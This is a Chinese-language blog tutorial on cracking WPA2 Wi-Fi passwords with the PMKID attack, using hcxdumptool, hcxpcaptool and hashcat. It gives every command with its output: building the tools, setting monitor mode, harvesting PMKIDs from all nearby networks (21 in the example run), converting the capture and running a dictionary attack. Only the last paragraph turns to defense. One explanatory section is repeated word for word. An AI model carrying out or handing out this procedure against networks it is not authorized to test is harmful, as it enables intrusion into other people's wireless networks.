首页 linux正文

使用新的PMKID Hashcat攻击破解WPA2密码

admin linux 2021-01-27 226 0

多年来,破解WPA2网络的密码大致相同,但是比起以前的技术,一种新的攻击所需的交互性和信息更少,并且具有能够在没有任何连接的情况下定位访问点的附加优点。针对PMKID的最新攻击使用Hashcat破解WPA密码,并使黑客可以更轻松地找到密码较弱的网络。


破解WPA2密码的旧方法

破解WPA2的旧方法已经存在了一段时间,涉及暂时断开连接的设备与我们要尝试破解的接入点的连接这有两个缺点,这对于Wi-Fi黑客了解至关重要。

第一个缺点是要求有人连接到网络以对其进行攻击。网络密码可能很弱并且很容易破解,但是如果没有连接设备以短暂启动,则没有机会捕获握手,因此也没有机会尝试对其进行破解。

此策略的第二个缺点是,它嘈杂且在法律上令人不安,因为它会迫使您发送故意断开授权用户使用其付费使用服务的数据包。从技术上讲,这种未经授权的干扰是一种拒绝服务攻击,如果持续下去,则等同于干扰网络。它可能会给您带来麻烦,并且容易被我们以前的一些指南所发现。


密码破解的新方法

攻击者可以使用新方法直接与易受攻击的访问点进行通信,而不必依靠拦截Wi-Fi设备之间的双向通信来尝试破解密码。2018年8月4日,在Hashcat论坛上的一篇帖子详细介绍了一种新技术,该技术利用对单个EAPOL框架的RSN IE(严格安全网络信息元素)的攻击来捕获所需信息,以进行暴力攻击。

与以前针对WPA的攻击类似,攻击者必须位于他们希望攻击的网络附近。目的是使用兼容Kali的无线网络适配器来捕获网络所需的信息,以尝试强行使用密码。而不是使用Aireplay-ng或Aircrack-ng,我们将使用一种称为hcxtools的新无线攻击工具来执行此操作


使用Hcxtools和Hashcat

Hcxdumptool和hcxpcaptool是为Wi-Fi审核和渗透测试编写的工具,它们使我们能够与附近的Wi-Fi网络进行交互,以捕获WPA握手和PMKID哈希。它与Besside-ng的工作方式相似,因为它需要最少的参数才能从命令行发起攻击,可以针对特定目标或方便目标运行,并且可以在Raspberry Pi或其他设备上通过SSH快速执行而无需屏幕。



捕获PMKID后,下一步是将哈希加载到Hashcat中并尝试破解密码。这是hcxtools与Besside-ng不同的地方,因为需要转换步骤才能为Hashcat准备文件。我们将使用hcxpcaptool将我们的PCAPNG文件转换为一个可以使用的Hashcat,只剩下为暴力破解尝试选择可靠的密码列表的步骤。


值得一提的是,并非每个网络都容易受到此攻击。由于这是某些制造商添加的可选字段,因此您不应期望此技术获得普遍成功。是否可以捕获PMKID取决于访问点的制造商是否赞成包含一个包含它的元素,以及是否可以破解捕获的PMKID取决于底层密码是否包含在蛮力密码列表中。如果不满足任何一个条件,此攻击将失败。


使用Hcxtools和Hashcat

Hcxdumptool和hcxpcaptool是为Wi-Fi审核和渗透测试编写的工具,它们使我们能够与附近的Wi-Fi网络进行交互,以捕获WPA握手和PMKID哈希。它与Besside-ng的工作方式相似,因为它需要最少的参数才能从命令行发起攻击,可以针对特定目标或方便目标运行,并且可以在Raspberry Pi或其他设备上通过SSH快速执行而无需屏幕。



捕获PMKID后,下一步是将哈希加载到Hashcat中并尝试破解密码。这是hcxtools与Besside-ng不同的地方,因为需要转换步骤才能为Hashcat准备文件。我们将使用hcxpcaptool将我们的PCAPNG文件转换为一个可以使用的Hashcat,只剩下为暴力破解尝试选择可靠的密码列表的步骤。


值得一提的是,并非每个网络都容易受到此攻击。由于这是某些制造商添加的可选字段,因此您不应期望此技术获得普遍成功。是否可以捕获PMKID取决于访问点的制造商是否赞成包含一个包含它的元素,以及是否可以破解捕获的PMKID取决于底层密码是否包含在蛮力密码列表中。如果不满足任何一个条件,此攻击将失败。


安装Hxctools和Hashcat

首先,我们将安装所需的工具。要下载它们,请在终端窗口中输入以下内容。

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

然后,进入目录并使用make完成安装,然后进行make install

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

完成安装后,我们将继续安装hxctools。为此,请打开一个新的终端窗口或离开/ hexdumptool目录,然后安装hxctools。

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

接下来,转到其目录并像以前一样运行makemake install如果出现错误,请尝试在命令前键入sudo

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

最后,我们需要安装Hashcat,这应该很容易,因为它默认包含在Kali Linux存储库中。只需键入以下内容以安装最新版本的Hashcat。

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

完成此操作后,我们可以继续设置无线网络适配器。


第2步准备无线网络适配器

插入兼容Kali的无线网络适配器后,可以通过键入ifconfigip a查找名称通常,它将被命名为wlan0。第一步是将卡置于无线监控模式,使我们能够监听附近区域的Wi-Fi流量。

为此,请在终端窗口中键入以下命令,将您的无线网络适配器的名称替换为wlan0。

~# airmon-ng start wlan0

Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

 PID Name
 555 NetworkManager
 611 wpa_supplicant
6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

现在,您的无线网络适配器应具有类似“ wlan0mon”的名称,并且处于监视模式。您可以通过再次运行ifconfig来确认

第三步使用Hxcdump从本地网络捕获PMKID

现在,我们准备捕获要尝试攻击的设备的PMKID。在监视模式下将无线网络适配器的名称设置为“ wlan1mon”,我们将执行以下命令来开始攻击。

~# hcxdumptool -i wlan0mon -o galleria.pcapng --enable_status=1

分解一下,-i告诉程序我们正在使用哪个接口,在这种情况下为wlan1mon。我们将要保存结果的文件名可以使用-o标志参数指定我们要扫描的通道可以用-c标志表示,后跟要扫描的通道号。

在上面的命令中,我们使用wlan1mon将捕获的PMKID保存到名为“ galleria.pcapng”的文件中。虽然您可以指定另一个状态值,但是除1之外,我没有成功捕获任何值

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

收集到足够多的内容后,可以通过键入Control-C结束攻击来停止程序这应该产生一个PCAPNG文件,其中包含我们尝试进行暴力攻击所需的信息,但是我们需要将其转换为Hashcat可以理解的格式。

步骤4使用Hxcpcaptool转换Hashcat的转储

要转换我们的PCAPNG文件,我们将使用hcxpcaptool并指定一些参数。在保存.PCAPNG文件的文件夹中,在终端窗口中运行以下命令。

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

#转换为 hashcat -m 2500/2501
hcxpcaptool -E essidlist -I identitylist -U usernamelist -o galleria.hccapx ./galleria.pcapng

该命令告诉hxcpcaptool使用文件中包含的信息,通过-E-I-U标志来帮助Hashcat理解它-Z标志用于为Hashcat新转换的文件中使用的名称,以及该命令的最后一部分是我们要转换的文件PCAPNG。

运行命令应显示以下内容。

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

在这里,我们可以看到我们在很短的时间内收集了21个PMKID。现在,我们可以使用Hashcat中的“ galleriaHC.16800”文件来尝试破解网络密码。

第5步使用Hashcat选择密码列表和蛮力

要开始攻击我们捕获的哈希,我们需要选择一个好的密码列表。您可以在SecList集合中找到一些不错的密码列表来开始使用获得密码列表后,将其与刚转换的.16800文件放在同一文件夹中,然后在终端窗口中运行以下命令。

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

在此命令中,我们以16800模式启动Hashcat ,该模式用于攻击WPA-PMKID-PBKDF2网络协议。接下来,我们将指定要破解的文件的名称,在这种情况下为“ galleriaHC.16800”。-a标志告诉我们哪些类型的攻击来使用,在这种情况下,一个“直”的攻击,然后-w--kernel-加速= 1所flags指定的最高性能负载曲线。如果您的计算机遇到性能问题,则可以降低-w参数中的数字

接下来,-- force选项将忽略任何警告,以继续进行攻击,该命令的最后一部分指定了我们用来尝试暴力破解文件中PMKID的密码列表,在本例中为“ topwifipass”。文本文件。”

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

根据您的硬件速度和密码列表的大小,这可能需要花费一些时间才能完成。要随时查看状态,可以按S键进行更新。

第6步解释结果

随着Hashcat的破解,您将能够在进行过程中检入以查看是否已恢复任何密钥。

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

当密码列表即将结束时,Hashcat将自动调整工作量,并在完成时为您提供最终报告。

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

如果您设法破解了所有密码,则会在此处看到它们。在我们的测试运行中,我们收集的所有PMKID都不包含密码列表中的密码,因此我们无法破解任何哈希。对于任何使用强密码的网络,这也很可能是您的结果,但是希望在此处使用弱密码的网络看到结果。

PMKID Hashcat攻击使Wi-Fi攻击更容易

虽然针对Wi-Fi密码的新攻击使黑客可以更轻松地对目标进行攻击,但有效的方法仍可以有效地对抗以前的WPA破解类型。如果您的网络甚至不支持包含PMKID的强大安全元素,则此攻击没有成功的机会。您可以使用hcxtools审核自己的网络,以查看它是否容易受到此攻击。

即使您的网络容易受到攻击,强密码仍然是抵御攻击者使用此密码攻击或其他密码破解攻击访问您的Wi-Fi网络的最佳防御方法。

由于这些攻击依赖于猜测Wi-Fi网络使用的密码,因此有两种常见的猜测来源:首先是用户选择默认密码或严重错误的密码,例如“ 12345678”或“ password”。这些将很容易被破解。密码猜测的第二个来源来自泄露了数百万真实用户密码的数据泄露由于许多用户将在不同类型的帐户之间重复使用密码,因此这些列表在破解Wi-Fi网络方面非常有效。

希望您喜欢本指南,该指南对WPA2密码进行了新的基于PMKID的Hashcat攻击!如果您对本教程的Wi-Fi密码破解有任何疑问或有任何评论,







版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。

评论